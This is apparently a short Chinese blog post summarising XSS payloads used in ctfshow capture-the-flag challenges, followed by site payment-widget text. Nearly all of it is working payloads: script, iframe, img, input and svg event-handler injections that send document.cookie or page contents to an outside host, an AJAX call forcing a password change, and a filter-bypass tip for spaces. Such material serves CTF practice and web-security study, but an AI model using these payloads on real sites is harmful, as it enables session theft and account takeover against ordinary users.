2022/1/5ctfshowXSS小结

测试输入框
用户名
密码等
会写JavaScript外带
burp suite找到处理页面

外带

<script>window.location.href='http://www.yuxuanzhe.com/x.php?1='+document.cookie;</script>

处理后外带

<script>window.open('http://www.yuxuanzhe.com/tmp/flag.txt'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

外带

<iframe	onload="window.open('http://www.yuxuanzhe.com/x.php?1='+document.cookie)"></iframe>

post传参

<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

外带

<script>
    var img = document.createElement("img");
    img.src = "http://www.yuxuanzhe.com/x.php/?1=" + document.cookie;
</script>

这个虽然是图片,但还是有效果。这个代码要加载资源就要访问后面的url,无论这个url是否真的是图片,它终究还是get提交了cookie。
其他更多的也是同理

<input onfocus="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)" autofocus>
<svg onload="window.open('http://www.yuxuanzhe.com/x.php/?1=' + document.cookie)">

过滤空格可以用/和/**/绕过

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值